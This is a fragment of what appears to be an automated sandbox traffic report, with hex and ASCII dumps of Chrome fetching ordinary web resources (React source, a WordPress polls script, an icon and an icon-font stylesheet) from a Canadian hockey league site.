                                                                                                                          2025-01-13 21:01:15 UTC1369INData Raw: 76 61 69 6c 61 62 6c 65 20 69 6e 20 43 68 72 6f 6d 65 2c 20 53 61 66 61 72 69 2c 20 4f 70 65 72 61 2c 20 61 6e 64 20 49 45 2e 20 54 68 69 73 20 65 76 65 6e 74 20 66 69 72 65 73 20 61 66 74 65 72 0a 20 2a 20 60 6f 6e 4b 65 79 50 72 65 73 73 60 20 61 6e 64 20 60 6f 6e 43 6f 6d 70 6f 73 69 74 69 6f 6e 45 6e 64 60 2c 20 62 75 74 20 62 65 66 6f 72 65 20 60 6f 6e 49 6e 70 75 74 60 2e 0a 20 2a 0a 20 2a 20 60 62 65 66 6f 72 65 49 6e 70 75 74 60 20 69 73 20 73 70 65 63 27 64 20 62 75 74 20 6e 6f 74 20 69 6d 70 6c 65 6d 65 6e 74 65 64 20 69 6e 20 61 6e 79 20 62 72 6f 77 73 65 72 73 2c 20 61 6e 64 0a 20 2a 20 74 68 65 20 60 69 6e 70 75 74 60 20 65 76 65 6e 74 20 64 6f 65 73 20 6e 6f 74 20 70 72 6f 76 69 64 65 20 61 6e 79 20 75 73 65 66 75 6c 20 69 6e 66 6f 72 6d 61
                                                                                                                          Data Ascii: vailable in Chrome, Safari, Opera, and IE. This event fires after * `onKeyPress` and `onCompositionEnd`, but before `onInput`. * * `beforeInput` is spec'd but not implemented in any browsers, and * the `input` event does not provide any useful informa
                                                                                                                          2025-01-13 21:01:15 UTC1369INData Raw: 20 20 20 20 2a 20 63 61 6e 63 65 6c 73 20 63 68 61 72 61 63 74 65 72 20 69 6e 73 65 72 74 69 6f 6e 2c 20 62 75 74 20 69 74 20 2a 61 6c 73 6f 2a 20 63 61 75 73 65 73 20 74 68 65 20 62 72 6f 77 73 65 72 0a 20 20 20 20 20 20 20 20 20 20 20 2a 20 74 6f 20 66 61 6c 6c 20 62 61 63 6b 20 74 6f 20 69 74 73 20 64 65 66 61 75 6c 74 20 73 70 61 63 65 62 61 72 20 62 65 68 61 76 69 6f 72 20 6f 66 20 73 63 72 6f 6c 6c 69 6e 67 20 74 68 65 0a 20 20 20 20 20 20 20 20 20 20 20 2a 20 70 61 67 65 2e 0a 20 20 20 20 20 20 20 20 20 20 20 2a 0a 20 20 20 20 20 20 20 20 20 20 20 2a 20 54 72 61 63 6b 69 6e 67 20 61 74 3a 0a 20 20 20 20 20 20 20 20 20 20 20 2a 20 68 74 74 70 73 3a 2f 2f 63 6f 64 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 2f 63 68 72 6f 6d 69 75 6d 2f 69 73 73 75 65
                                                                                                                          Data Ascii: * cancels character insertion, but it *also* causes the browser * to fall back to its default spacebar behavior of scrolling the * page. * * Tracking at: * https://code.google.com/p/chromium/issue
                                                                                                                          2025-01-13 21:01:15 UTC1369INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 2f 2f 20 63 68 61 72 73 2e 20 50 61 73 74 65 20 65 76 65 6e 74 73 20 73 68 6f 75 6c 64 20 6e 6f 74 20 6c 65 61 64 20 74 6f 20 42 65 66 6f 72 65 49 6e 70 75 74 20 65 76 65 6e 74 73 2e 0a 20 20 20 20 20 20 20 20 20 20 66 61 6c 6c 62 61 63 6b 43 68 61 72 73 20 3d 20 6e 75 6c 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b 3b 0a 20 20 20 20 20 20 20 20 63 61 73 65 20 74 6f 70 4c 65 76 65 6c 54 79 70 65 73 2e 74 6f 70 4b 65 79 50 72 65 73 73 3a 0a 20 20 20 20 20 20 20 20 20 20 2f 2a 2a 0a 20 20 20 20 20 20 20 20 20 20 20 2a 20 41 73 20 6f 66 20 76 32 37 2c 20 46 69 72 65 66 6f 78 20 6d 61 79 20 66 69 72 65 20 6b 65 79 70 72 65 73 73 20 65 76 65 6e 74 73 20 65 76 65 6e 20 77 68 65 6e 20 6e 6f 20 63 68 61 72 61 63 74 65 72
                                                                                                                          Data Ascii: // chars. Paste events should not lead to BeforeInput events. fallbackChars = null; break; case topLevelTypes.topKeyPress: /** * As of v27, Firefox may fire keypress events even when no character
                                                                                                                          2025-01-13 21:01:15 UTC1369INData Raw: 61 63 6b 43 68 61 72 73 20 3d 3d 3d 20 6e 75 6c 6c 29 20 7b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 63 68 61 72 73 20 3d 20 66 61 6c 6c 62 61 63 6b 43 68 61 72 73 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2f 2f 20 49 66 20 6e 6f 20 63 68 61 72 61 63 74 65 72 73 20 61 72 65 20 62 65 69 6e 67 20 69 6e 73 65 72 74 65 64 2c 20 6e 6f 20 42 65 66 6f 72 65 49 6e 70 75 74 20 65 76 65 6e 74 20 73 68 6f 75 6c 64 0a 20 20 20 20 2f 2f 20 62 65 20 66 69 72 65 64 2e 0a 20 20 20 20 69 66 20 28 21 63 68 61 72 73 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 76 61 72 20 65 76 65 6e 74 20 3d 20 53 79 6e 74 68 65 74 69 63 49 6e 70 75 74 45 76 65 6e 74 2e 67 65 74 50 6f 6f 6c 65 64
                                                                                                                          Data Ascii: ackChars === null) { return; } chars = fallbackChars; } // If no characters are being inserted, no BeforeInput event should // be fired. if (!chars) { return; } var event = SyntheticInputEvent.getPooled
                                                                                                                          2025-01-13 21:01:15 UTC1369INData Raw: 0a 20 2a 20 64 69 73 70 6c 61 79 20 6f 66 20 65 6c 65 6d 65 6e 74 73 2e 0a 20 2a 2f 0a 0a 76 61 72 20 43 53 53 43 6f 72 65 20 3d 20 7b 0a 0a 20 20 2f 2a 2a 0a 20 20 20 2a 20 41 64 64 73 20 74 68 65 20 63 6c 61 73 73 20 70 61 73 73 65 64 20 69 6e 20 74 6f 20 74 68 65 20 65 6c 65 6d 65 6e 74 20 69 66 20 69 74 20 64 6f 65 73 6e 27 74 20 61 6c 72 65 61 64 79 20 68 61 76 65 20 69 74 2e 0a 20 20 20 2a 0a 20 20 20 2a 20 40 70 61 72 61 6d 20 7b 44 4f 4d 45 6c 65 6d 65 6e 74 7d 20 65 6c 65 6d 65 6e 74 20 74 68 65 20 65 6c 65 6d 65 6e 74 20 74 6f 20 73 65 74 20 74 68 65 20 63 6c 61 73 73 20 6f 6e 0a 20 20 20 2a 20 40 70 61 72 61 6d 20 7b 73 74 72 69 6e 67 7d 20 63 6c 61 73 73 4e 61 6d 65 20 74 68 65 20 43 53 53 20 63 6c 61 73 73 4e 61 6d 65 0a 20 20 20 2a 20 40 72
                                                                                                                          Data Ascii: * display of elements. */var CSSCore = { /** * Adds the class passed in to the element if it doesn't already have it. * * @param {DOMElement} element the element to set the class on * @param {string} className the CSS className * @r


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          32192.168.11.2049828137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:15 UTC594OUTGET /app/plugins/wp-polls/polls-js.js?ver=2.7 HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:15 UTC519INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:15 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 2994
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Fri, 05 Sep 2014 02:36:26 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:54 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 961971120 961417549
                                                                                                                          Age: 81
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"540921aa-bb2"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:15 UTC2994INData Raw: 76 61 72 20 70 6f 6c 6c 5f 69 64 3d 30 2c 70 6f 6c 6c 5f 61 6e 73 77 65 72 5f 69 64 3d 22 22 2c 69 73 5f 62 65 69 6e 67 5f 76 6f 74 65 64 3d 21 31 3b 70 6f 6c 6c 73 4c 31 30 6e 2e 73 68 6f 77 5f 6c 6f 61 64 69 6e 67 3d 70 61 72 73 65 49 6e 74 28 70 6f 6c 6c 73 4c 31 30 6e 2e 73 68 6f 77 5f 6c 6f 61 64 69 6e 67 29 3b 70 6f 6c 6c 73 4c 31 30 6e 2e 73 68 6f 77 5f 66 61 64 69 6e 67 3d 70 61 72 73 65 49 6e 74 28 70 6f 6c 6c 73 4c 31 30 6e 2e 73 68 6f 77 5f 66 61 64 69 6e 67 29 3b 0a 66 75 6e 63 74 69 6f 6e 20 70 6f 6c 6c 5f 76 6f 74 65 28 62 29 7b 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 73 5f 62 65 69 6e 67 5f 76 6f 74 65 64 3f 61 6c 65 72 74 28 70 6f 6c 6c 73 4c 31 30 6e 2e 74 65 78 74 5f 77
                                                                                                                          Data Ascii: var poll_id=0,poll_answer_id="",is_being_voted=!1;pollsL10n.show_loading=parseInt(pollsL10n.show_loading);pollsL10n.show_fading=parseInt(pollsL10n.show_fading);function poll_vote(b){jQuery(document).ready(function(a){is_being_voted?alert(pollsL10n.text_w


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          33192.168.11.204982954.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:15 UTC416OUTGET /app/uploads/gthl/2024/08/29093927/icons8-youtube-48-1.png HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:15 UTC484INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/png
                                                                                                                          Content-Length: 657
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:16 GMT
                                                                                                                          Last-Modified: Thu, 29 Aug 2024 13:39:28 GMT
                                                                                                                          ETag: "ca52040004058032766383ad85952220"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 e0ed595b39732d9e9972db26854384ec.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: CmX_kG-gCTFDbjfox1w_sOAitRMailtScBNdhUkSqmfWGDTO9tskvw==
                                                                                                                          2025-01-13 21:01:15 UTC657INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 02 43 49 44 41 54 78 9c ed 98 bb 6b 14 51 18 c5 4f 22 26 c1 22 92 08 62 63 6b a1 a8 45 40 d4 f9 be 24 6a 93 22 62 21 69 2c 2c a2 11 5f 60 69 27 42 44 0d b1 c9 3f 90 22 8f 46 b1 51 a2 01 31 e0 bb 50 b4 f0 81 8f 4a 12 b4 f1 15 71 09 46 d8 23 77 dc 59 74 49 9c 99 cc dd 9d 19 bd 3f 38 b0 0c b3 df 3d 87 3b 33 f7 de 0f 70 38 1c 0e 87 e3 7f 80 bb b0 8a 1e 36 d3 c3 6e 2a 8e 53 31 40 c1 18 05 13 14 dc a7 e0 05 05 ef a8 f8 e4 4b 30 47 05 7d fd fa 1d 5c 37 f7 3c a7 e0 9e ff 5f c5 28 05 e7 a8 38 e6 d7 36 63 6c 45 6b 72 c3 40 3d 05 7d 14 4c 51 51 28 9b a9 9d 0a a5 b1 0f 12 a8 8b 67 7e 3d 1a 28 98 4c c1
                                                                                                                          Data Ascii: PNGIHDR00WpHYsCIDATxkQO"&"bckE@$j"b!i,,_`i'BD?"FQ1PJqF#wYtI?8=;3p86n*S1@K0G}\7<_(86clEkr@=}LQQ(g~=(L


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          34192.168.11.2049831104.17.25.144431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:15 UTC622OUTGET /ajax/libs/material-design-iconic-font/2.1.2/css/material-design-iconic-font.min.css HTTP/1.1
                                                                                                                          Host: cdnjs.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:16 UTC949INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:16 GMT
                                                                                                                          Content-Type: text/css; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Cache-Control: public, max-age=30672000
                                                                                                                          ETag: W/"5eb03ed9-10ad7"
                                                                                                                          Last-Modified: Mon, 04 May 2020 16:12:09 GMT
                                                                                                                          cf-cdnjs-via: cfworker/kv
                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                          Timing-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 213867
                                                                                                                          Expires: Sat, 03 Jan 2026 21:01:16 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S4lo4ncdfYTEmeMmK%2BMuWe%2FrJRVcl4WhUau5AcxyT3JRtUVC5W59Gl63IfGICxaf3nJ0xp%2FECkv%2B7cqg1zj3PSEHhTAxjYShZFG2pK7sr4%2Bh0CeDit3SN1jsvnave6TOlL8ntHhQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Strict-Transport-Security: max-age=15780000
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 9018520f2eadd64b-IAD
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2025-01-13 21:01:16 UTC420INData Raw: 37 62 66 63 0d 0a 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 61 74 65 72 69 61 6c 2d 44 65 73 69 67 6e 2d 49 63 6f 6e 69 63 2d 46 6f 6e 74 3b 73 72 63 3a 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 4d 61 74 65 72 69 61 6c 2d 44 65 73 69 67 6e 2d 49 63 6f 6e 69 63 2d 46 6f 6e 74 2e 77 6f 66 66 32 3f 76 3d 32 2e 31 2e 30 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 2c 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 4d 61 74 65 72 69 61 6c 2d 44 65 73 69 67 6e 2d 49 63 6f 6e 69 63 2d 46 6f 6e 74 2e 77 6f 66 66 3f 76 3d 32 2e 31 2e 30 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 2c 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 4d 61 74 65 72 69 61 6c 2d 44 65 73 69 67 6e 2d 49 63 6f 6e 69 63 2d 46 6f 6e 74 2e 74 74 66 3f 76 3d 32 2e 31 2e 30
                                                                                                                          Data Ascii: 7bfc@font-face{font-family:Material-Design-Iconic-Font;src:url(../fonts/Material-Design-Iconic-Font.woff2?v=2.1.0) format('woff2'),url(../fonts/Material-Design-Iconic-Font.woff?v=2.1.0) format('woff'),url(../fonts/Material-Design-Iconic-Font.ttf?v=2.1.0
                                                                                                                          2025-01-13 21:01:16 UTC1369INData Raw: 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 3b 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 67 72 61 79 73 63 61 6c 65 7d 2e 7a 6d 64 69 2d 68 63 2d 6c 67 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 33 33 33 33 33 33 33 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 2e 37 35 65 6d 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 2d 31 35 25 7d 2e 7a 6d 64 69 2d 68 63 2d 32 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 65 6d 7d 2e 7a 6d 64 69 2d 68 63 2d 33 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 65 6d 7d 2e 7a 6d 64 69 2d 68 63 2d 34 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 65 6d 7d 2e 7a 6d 64 69 2d 68 63 2d 35 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 35 65 6d 7d 2e 7a 6d 64 69 2d 68 63 2d 66 77 7b 77 69 64 74 68 3a 31 2e 32 38 35 37 31
                                                                                                                          Data Ascii: othing:antialiased;-moz-osx-font-smoothing:grayscale}.zmdi-hc-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.zmdi-hc-2x{font-size:2em}.zmdi-hc-3x{font-size:3em}.zmdi-hc-4x{font-size:4em}.zmdi-hc-5x{font-size:5em}.zmdi-hc-fw{width:1.28571
                                                                                                                          2025-01-13 21:01:16 UTC1369INData Raw: 72 6f 74 61 74 65 28 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 31 30 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 33 35 39 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 33 35 39 64 65 67 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 7a 6d 64 69 2d 73 70 69 6e 2d 72 65 76 65 72 73 65 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 31 30 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 33 35 39 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 33 35 39 64 65 67 29 7d 7d 2e
                                                                                                                          Data Ascii: rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(-359deg);transform:rotate(-359deg)}}@keyframes zmdi-spin-reverse{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(-359deg);transform:rotate(-359deg)}}.
                                                                                                                          2025-01-13 21:01:16 UTC1369INData Raw: 61 73 73 69 67 6e 6d 65 6e 74 2d 63 68 65 63 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 30 38 27 7d 2e 7a 6d 64 69 2d 61 73 73 69 67 6e 6d 65 6e 74 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 30 39 27 7d 2e 7a 6d 64 69 2d 61 73 73 69 67 6e 6d 65 6e 74 2d 72 65 74 75 72 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 30 61 27 7d 2e 7a 6d 64 69 2d 61 73 73 69 67 6e 6d 65 6e 74 2d 72 65 74 75 72 6e 65 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 30 62 27 7d 2e 7a 6d 64 69 2d 61 73 73 69 67 6e 6d 65 6e 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 30 63 27 7d 2e 7a 6d 64 69 2d 61 74 74 61 63 68 6d 65 6e 74 2d 61 6c 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27
                                                                                                                          Data Ascii: assignment-check:before{content:'\f108'}.zmdi-assignment-o:before{content:'\f109'}.zmdi-assignment-return:before{content:'\f10a'}.zmdi-assignment-returned:before{content:'\f10b'}.zmdi-assignment:before{content:'\f10c'}.zmdi-attachment-alt:before{content:'
                                                                                                                          2025-01-13 21:01:16 UTC1369INData Raw: 31 32 61 27 7d 2e 7a 6d 64 69 2d 63 61 73 65 2d 64 6f 77 6e 6c 6f 61 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 32 62 27 7d 2e 7a 6d 64 69 2d 63 61 73 65 2d 70 6c 61 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 32 63 27 7d 2e 7a 6d 64 69 2d 63 61 73 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 32 64 27 7d 2e 7a 6d 64 69 2d 63 61 73 74 2d 63 6f 6e 6e 65 63 74 65 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 32 65 27 7d 2e 7a 6d 64 69 2d 63 61 73 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 32 66 27 7d 2e 7a 6d 64 69 2d 63 68 61 72 74 2d 64 6f 6e 75 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 33 30 27 7d 2e 7a 6d 64 69 2d 63 68 61 72 74 3a 62 65 66
                                                                                                                          Data Ascii: 12a'}.zmdi-case-download:before{content:'\f12b'}.zmdi-case-play:before{content:'\f12c'}.zmdi-case:before{content:'\f12d'}.zmdi-cast-connected:before{content:'\f12e'}.zmdi-cast:before{content:'\f12f'}.zmdi-chart-donut:before{content:'\f130'}.zmdi-chart:bef
                                                                                                                          2025-01-13 21:01:16 UTC1369INData Raw: 6f 6e 74 65 6e 74 3a 27 5c 66 31 34 61 27 7d 2e 7a 6d 64 69 2d 63 6f 6c 6c 65 63 74 69 6f 6e 2d 69 74 65 6d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 34 62 27 7d 2e 7a 6d 64 69 2d 63 6f 6c 6c 65 63 74 69 6f 6e 2d 6d 75 73 69 63 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 34 63 27 7d 2e 7a 6d 64 69 2d 63 6f 6c 6c 65 63 74 69 6f 6e 2d 70 64 66 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 34 64 27 7d 2e 7a 6d 64 69 2d 63 6f 6c 6c 65 63 74 69 6f 6e 2d 70 6c 75 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 34 65 27 7d 2e 7a 6d 64 69 2d 63 6f 6c 6c 65 63 74 69 6f 6e 2d 73 70 65 61 6b 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 34 66 27 7d 2e 7a 6d 64 69 2d 63 6f 6c 6c 65 63
                                                                                                                          Data Ascii: ontent:'\f14a'}.zmdi-collection-item:before{content:'\f14b'}.zmdi-collection-music:before{content:'\f14c'}.zmdi-collection-pdf:before{content:'\f14d'}.zmdi-collection-plus:before{content:'\f14e'}.zmdi-collection-speaker:before{content:'\f14f'}.zmdi-collec
                                                                                                                          2025-01-13 21:01:16 UTC1369INData Raw: 6e 74 65 6e 74 3a 27 5c 66 31 36 64 27 7d 2e 7a 6d 64 69 2d 66 75 6e 63 74 69 6f 6e 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 36 65 27 7d 2e 7a 6d 64 69 2d 67 61 73 2d 73 74 61 74 69 6f 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 36 66 27 7d 2e 7a 6d 64 69 2d 67 65 73 74 75 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 37 30 27 7d 2e 7a 6d 64 69 2d 67 6c 6f 62 65 2d 61 6c 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 37 31 27 7d 2e 7a 6d 64 69 2d 67 6c 6f 62 65 2d 6c 6f 63 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 37 32 27 7d 2e 7a 6d 64 69 2d 67 6c 6f 62 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 37 33 27 7d 2e 7a 6d 64 69 2d 67 72 61 64
                                                                                                                          Data Ascii: ntent:'\f16d'}.zmdi-functions:before{content:'\f16e'}.zmdi-gas-station:before{content:'\f16f'}.zmdi-gesture:before{content:'\f170'}.zmdi-globe-alt:before{content:'\f171'}.zmdi-globe-lock:before{content:'\f172'}.zmdi-globe:before{content:'\f173'}.zmdi-grad
                                                                                                                          2025-01-13 21:01:16 UTC1369INData Raw: 2e 7a 6d 64 69 2d 6c 6f 63 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 39 31 27 7d 2e 7a 6d 64 69 2d 6d 61 69 6c 2d 72 65 70 6c 79 2d 61 6c 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 39 32 27 7d 2e 7a 6d 64 69 2d 6d 61 69 6c 2d 72 65 70 6c 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 39 33 27 7d 2e 7a 6d 64 69 2d 6d 61 69 6c 2d 73 65 6e 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 39 34 27 7d 2e 7a 6d 64 69 2d 6d 61 6c 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 39 35 27 7d 2e 7a 6d 64 69 2d 6d 61 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 39 36 27 7d 2e 7a 6d 64 69 2d 6d 65 6e 75 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 39
                                                                                                                          Data Ascii: .zmdi-lock:before{content:'\f191'}.zmdi-mail-reply-all:before{content:'\f192'}.zmdi-mail-reply:before{content:'\f193'}.zmdi-mail-send:before{content:'\f194'}.zmdi-mall:before{content:'\f195'}.zmdi-map:before{content:'\f196'}.zmdi-menu:before{content:'\f19
